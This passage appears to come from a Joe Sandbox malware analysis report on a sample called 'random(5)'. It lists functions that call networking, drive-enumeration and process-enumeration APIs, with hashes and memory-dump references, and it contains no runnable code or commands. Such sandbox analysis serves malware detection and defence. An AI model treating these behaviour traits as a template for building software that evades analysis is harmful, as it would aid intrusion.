Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: getsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 3358416759-2605427207
Opcode ID: dbf73c4820faf194ba79b96bd3494c2d9043ec0f1068eb1d86b4f050640ee006
Instruction ID: 62f3af69f9d591686cb34ab71b49b212ff9645de332b392d7fb48d39d2f1d4bb
Opcode Fuzzy Hash: dbf73c4820faf194ba79b96bd3494c2d9043ec0f1068eb1d86b4f050640ee006
Instruction Fuzzy Hash: 2B21FB71D48280A6F6259718EC46FF773ACEF91328F041654F99863151FB3259868BD2

Function 00E4D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202), ref: 00E4D65B

Strings

iphlpapi.dll, xrefs: 00E4D5F0
if_nametoindex, xrefs: 00E4D606

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: Startup
String ID: if_nametoindex$iphlpapi.dll
API String ID: 724789610-3097795196
Opcode ID: 82a56316d4d5c4ed5192062e75e81c075c5b792b0ac4ab4cd328b3927ac37ca5
Instruction ID: cf5b631f1abc2ebebea02b2ea8eaa428947cde984ca8aae5069056a21ef0c810
Opcode Fuzzy Hash: 82a56316d4d5c4ed5192062e75e81c075c5b792b0ac4ab4cd328b3927ac37ca5
Instruction Fuzzy Hash: 42012B90E4434106E721BF39BC1B72535947B51308F8A28A8E858A5182F66DC48CC2A2

Function 00EFAA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(FFFFFFFF,?,00000000), ref: 00EFAB9B
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00EFABE3

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: ioctlsocketsocket
String ID:
API String ID: 416004797-0
Opcode ID: 58c90f86107e542d753c42a043d7af0c20424a2e811a659a46f8ad255b39bc7e
Instruction ID: 65430efab4f67e4bb9f97272aec10e4241f73b414fb7542a4778821a502b032d
Opcode Fuzzy Hash: 58c90f86107e542d753c42a043d7af0c20424a2e811a659a46f8ad255b39bc7e
Instruction Fuzzy Hash: B3E1B1B06043059BE720CF24C885B7677E5AF85308F086A3DFA9DAB291D775D984CB92

Function 06E709C7 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: e372ce45768c95c8f0c7171fd7491970d3c4f143988b6e8dbd710aaa4d7f1f34
Instruction ID: 65fa69a3481452becf92b16bc1bf8532eb66bfb325f3d53406935112223eff00
Opcode Fuzzy Hash: e372ce45768c95c8f0c7171fd7491970d3c4f143988b6e8dbd710aaa4d7f1f34
Instruction Fuzzy Hash: 0941D0EB58C311BEB3C285855B14AFA6A6EF6C73317306066B403D7606E3D45B4D22B1

Function 06E709EE Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: be28e4b49a6ac0b319de6f857ce443b4b867fde426bd140304f0b49bcfbd52fb
Instruction ID: 2a75cff3175dd22b826b5347cb9a217f75be9f948cb65d786a551c0c46dbcb37
Opcode Fuzzy Hash: be28e4b49a6ac0b319de6f857ce443b4b867fde426bd140304f0b49bcfbd52fb
Instruction Fuzzy Hash: 8741BFFB58C311BDB3C285855B54AFA6A6EF6C7735B30A026B403D6606E3D41B4D21F1

Function 06E70A2B Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: 0d8b5c141c17ead06b7c80de59fac46584e9e7542d1f9caf70a8fc8309395c21
Instruction ID: a0977c4cd1e69910ea0d6325692979208ea2a362345c00a306b69ce2da5e5d53
Opcode Fuzzy Hash: 0d8b5c141c17ead06b7c80de59fac46584e9e7542d1f9caf70a8fc8309395c21
Instruction Fuzzy Hash: 8741E3EB58C311BEB7C285815B589FA6B6EFAC7331730A066F403DA506E3D41B4D52B1

Function 06E70A5A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: c29f6660211358461840a1a8c8cb33adcf155309a08fb5d9089068ffaef3544e
Instruction ID: 283125af586f579220b831e6e2e9bd3b3771275fd8ae34516f46a9e5340dc1a6
Opcode Fuzzy Hash: c29f6660211358461840a1a8c8cb33adcf155309a08fb5d9089068ffaef3544e
Instruction Fuzzy Hash: 413190EB58C311BDB3C2C5815B54AFA6A6EF6C7335730A062B803DA606E3D45B4D61B1

Function 06E70A82 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: 67975f252f881fb56bf3e47eda1f159467e8197c84fbe2deb6d48440cd9a6c7f
Instruction ID: 13f8f914faa68ef500fcde3cf43edbdf55270c4e446fa6c6a53cc8517877833a
Opcode Fuzzy Hash: 67975f252f881fb56bf3e47eda1f159467e8197c84fbe2deb6d48440cd9a6c7f
Instruction Fuzzy Hash: 0431E4EB18C311BEB7C281815B04AFB6A2EF7C7331B30A062B403D6606E3E46B4911B0

Function 06E70A8F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: e8dc24109bcbcfd282e4b748e7a29c1168ec602d852c02bced801a4d4d05307c
Instruction ID: 097691dd77e14ad1a1aa4429dd6b6becb0323c3c599accc1b12175183aa12244
Opcode Fuzzy Hash: e8dc24109bcbcfd282e4b748e7a29c1168ec602d852c02bced801a4d4d05307c
Instruction Fuzzy Hash: 2431F4EB18C315BEB3C285815B54AFA6A2EF7C7335730A062B403E6606E3E46B4D51B0

Function 06E70AE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: 402391596a431ff5bcd58f11fbacffbb6620a1812853c01190964390b7ccb836
Instruction ID: 276dd456932187540543c4aacccc961b8a626f9460d40873d03f4c13aea42922
Opcode Fuzzy Hash: 402391596a431ff5bcd58f11fbacffbb6620a1812853c01190964390b7ccb836
Instruction Fuzzy Hash: 5F21C1EB44C311ADB7C2C1815758AFA6A2EF7C6335770A072B403E6506E3941B4D51B1

Function 06E70AF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: edaa5d9c67b8c53229c3286296cfe7837300a5d693d094100c6cd38f186ea95f
Instruction ID: d2e572d607b0794d5407e40d7ae6837cdb648ac529aae05b4e3c1cf4df2f2f1f
Opcode Fuzzy Hash: edaa5d9c67b8c53229c3286296cfe7837300a5d693d094100c6cd38f186ea95f
Instruction Fuzzy Hash: 2421C2EB54C311BDB7C2C5815B58AFA6A2EF7D7335730A462B403E650AE2D42B4D11B0

Function 06E70B0D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: dea8fc9993929802cdd1628e1fd7fd11ca6f8a05a9319d73ebcca6313c414115
Instruction ID: 1f93636427795843258e383653ea698a80beb6a36ee321a5f7248e45f0207791
Opcode Fuzzy Hash: dea8fc9993929802cdd1628e1fd7fd11ca6f8a05a9319d73ebcca6313c414115
Instruction Fuzzy Hash: 3C2135EB04C301FDF7C285809754AFA662EF7C7336730A062B803E650AE7A41B4D12B0

Function 06E70B23 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: 92d8d1f6500a4a7bcf9724368c8d1eb4dda23763f6a270d72ad69af9c60504c1
Instruction ID: fc7b54585e542112801766b6229335cae5a27c461c08c2c09ac5d9999f418093
Opcode Fuzzy Hash: 92d8d1f6500a4a7bcf9724368c8d1eb4dda23763f6a270d72ad69af9c60504c1
Instruction Fuzzy Hash: 032138EB44C311BEB7C1C1C057586FA6A2EB7DB336730A072B803EA50AE3941B0D12B0

Function 06E70B52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: 9c37a6b0e128349d8d41f27284f71f1a63e754cfb8c66292f62dc600b5177802
Instruction ID: 3d88c95bfd980ebb086fc4f3a4f39a57784dcdf5bd24b305d38a890bf030a0d5
Opcode Fuzzy Hash: 9c37a6b0e128349d8d41f27284f71f1a63e754cfb8c66292f62dc600b5177802
Instruction Fuzzy Hash: FC1136EB44C311BEF3C281915B586FA2B2EF7D7236730A067F403DA20AE6941B4D12B1

Function 06E70B40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: 2d995211a36bdba9c610b010e32aaf7f9aeee04ce5ae6c25871e3a09e02ca7d2
Instruction ID: 6214b14649827453383da8f7d1e2d8355b2d542638ed355a4553a3e1ce069e68
Opcode Fuzzy Hash: 2d995211a36bdba9c610b010e32aaf7f9aeee04ce5ae6c25871e3a09e02ca7d2
Instruction Fuzzy Hash: BF1106FB44C311FEB7C285815B54AFA6B2EF7D6336730A066F403D650AE3A41B4912B0

Function 06E70B63 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\
API String ID: 999431828-3379428675
Opcode ID: 2ba045adbc030404b3bb134096047092ce478a5f70da8a9be88f24ed813a980e
Instruction ID: 12477f2fc3be04e51447c5917aa3d708effec263e05040a905f58c05974278a0
Opcode Fuzzy Hash: 2ba045adbc030404b3bb134096047092ce478a5f70da8a9be88f24ed813a980e
Instruction Fuzzy Hash: 4711C4EB44C312BDB3C285815B586FA662EF6D6236730A466F403DA606E2A41B4D16B0

Function 00E378B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 00E378BC

Strings

FD %s:%d sclose(%d), xrefs: 00E378CB

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: closesocket
String ID: FD %s:%d sclose(%d)
API String ID: 2781271927-3116021458
Opcode ID: 4fedc1b169d500cc99dfe876537bdfc2244d2b2c0713a7515ef985761910e7e9
Instruction ID: 5ba39929f8e2e63fa06fe3b70dd15678029f746fc365dbfaf512f0629c06de1a
Opcode Fuzzy Hash: 4fedc1b169d500cc99dfe876537bdfc2244d2b2c0713a7515ef985761910e7e9
Instruction Fuzzy Hash: 4FD05EB2A092312B863069596C4DC4B7FE8DEC6F60F4A1C59F98477214E1309C05C7E2

Function 00EFB060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00EFB29E,?,00000000,?,?), ref: 00EFB0BA
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00EE3C41,00000000), ref: 00EFB0C1

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: ErrorLastconnect
String ID:
API String ID: 374722065-0
Opcode ID: 5fe103fe4c584964cfb79faf41817e3912248c4d43554dd8299540ec7e6bf628
Instruction ID: ab5bd2f19f6c0de16091e8dbc7cce060652f4e4fd6449967daaa44058d0c138f
Opcode Fuzzy Hash: 5fe103fe4c584964cfb79faf41817e3912248c4d43554dd8299540ec7e6bf628
Instruction Fuzzy Hash: F701D836304204DBCA205A69D844EBBB399FF89368F040754FA78A71D1DB26ED509751

Function 06E6018A Relevance: 2.0, Strings: 1, Instructions: 781COMMON

Download Yara Rule

Strings

kZXd, xrefs: 06E601A9

Memory Dump Source

Source File: 00000000.00000002.2261604199.0000000006E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e60000_random(5).jbxd

Similarity

API ID:
String ID: kZXd
API String ID: 0-2499114597
Opcode ID: 5a9299f9b0a1011179c95fcc88a4ccc042eb85db66e8e304c8ad0f6abda87645
Instruction ID: bb8949aaccf8798d6587d281635be8f0b74cbcee5be32388e5800cc9a7de994e
Opcode Fuzzy Hash: 5a9299f9b0a1011179c95fcc88a4ccc042eb85db66e8e304c8ad0f6abda87645
Instruction Fuzzy Hash: A0F1D5E71CC331BDB3D281876B54AFA6B6EE7D73B0B30A426F403D5542E2D40A8A55B1

Function 06E601D8 Relevance: 2.0, Strings: 1, Instructions: 775COMMON

Download Yara Rule

Strings

kZXd, xrefs: 06E601A9

Memory Dump Source

Source File: 00000000.00000002.2261604199.0000000006E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e60000_random(5).jbxd

Similarity

API ID:
String ID: kZXd
API String ID: 0-2499114597
Opcode ID: 0d184f711f1c1f7bb18feeb48d641eebd9abea860565141cd5f4ffb5559d85d0
Instruction ID: 34585436d5fc34e52453ee343fcc0dd63abeafde58a7eba6d4d15ea458f11e44
Opcode Fuzzy Hash: 0d184f711f1c1f7bb18feeb48d641eebd9abea860565141cd5f4ffb5559d85d0
Instruction Fuzzy Hash: 3CF1D6E71CC331BDB3D281836B54AFA6B6EE7D77B0B30A426F403D5542E2D40A8955B1

Function 06EC0344 Relevance: 1.9, APIs: 1, Instructions: 405COMMON

Download Yara Rule

APIs

Process32FirstW.KERNEL32(0000D5F3,0000D5F3,0000D5F3,?), ref: 06EC04E2

Memory Dump Source

Source File: 00000000.00000002.2261725711.0000000006EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_random(5).jbxd

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: 33857e972da2e24f6e2def2cff59644b1b8e91a49b5e594f2cf204df3f4923fa
Instruction ID: bb57a53a51adce4d070bd92378383374b502c429aadf5b87b7ef57cfc36e277f
Opcode Fuzzy Hash: 33857e972da2e24f6e2def2cff59644b1b8e91a49b5e594f2cf204df3f4923fa
Instruction Fuzzy Hash: 9481A0EB14C321FDB39295856F54AFB676EE2D6330730942EF803D2642E3960E4B65B1

Function 06EC03CA Relevance: 1.9, APIs: 1, Instructions: 372COMMON

Download Yara Rule

APIs

Process32FirstW.KERNEL32(0000D5F3,0000D5F3,0000D5F3,?), ref: 06EC04E2

Memory Dump Source

Source File: 00000000.00000002.2261725711.0000000006EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_random(5).jbxd

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: a4bf1876845ffe34def1afa4268ecd779f0db6bd75e7b9b455977e9416e5587c
Instruction ID: c1464e7d10ac5c36c0acc07eb385a3ec05ddc556b67d787d67d4a1a45aa74fda
Opcode Fuzzy Hash: a4bf1876845ffe34def1afa4268ecd779f0db6bd75e7b9b455977e9416e5587c
Instruction Fuzzy Hash: C471A2EB14C321FDB39295556B54AFB676EE2D2330730942EF803D2642E3960E8F64B1

Function 06EC03F5 Relevance: 1.9, APIs: 1, Instructions: 359COMMON

Download Yara Rule

APIs

Process32FirstW.KERNEL32(0000D5F3,0000D5F3,0000D5F3,?), ref: 06EC04E2

Memory Dump Source

Source File: 00000000.00000002.2261725711.0000000006EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_random(5).jbxd

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: b77c355df451086abcfec858ef9e522681fe02b12d88c47dc7d1b7258a2c2fe6
Instruction ID: 8f817e7e9c30deff3a3d188a81920d06bd9c84e380c79f598151601c17d6033e
Opcode Fuzzy Hash: b77c355df451086abcfec858ef9e522681fe02b12d88c47dc7d1b7258a2c2fe6
Instruction Fuzzy Hash: 266170EB14C321FDB39295956F14AFB676EE2D2730730D42EF803D1642E2960E8B65B1

Function 06EC03FF Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

APIs

Process32FirstW.KERNEL32(0000D5F3,0000D5F3,0000D5F3,?), ref: 06EC04E2

Memory Dump Source

Source File: 00000000.00000002.2261725711.0000000006EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec0000_random(5).jbxd

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: e39fe361fe3a193ecc78fc7f5fa5fea39d2e3c38bc7ba92ee01f182fb6e879a9
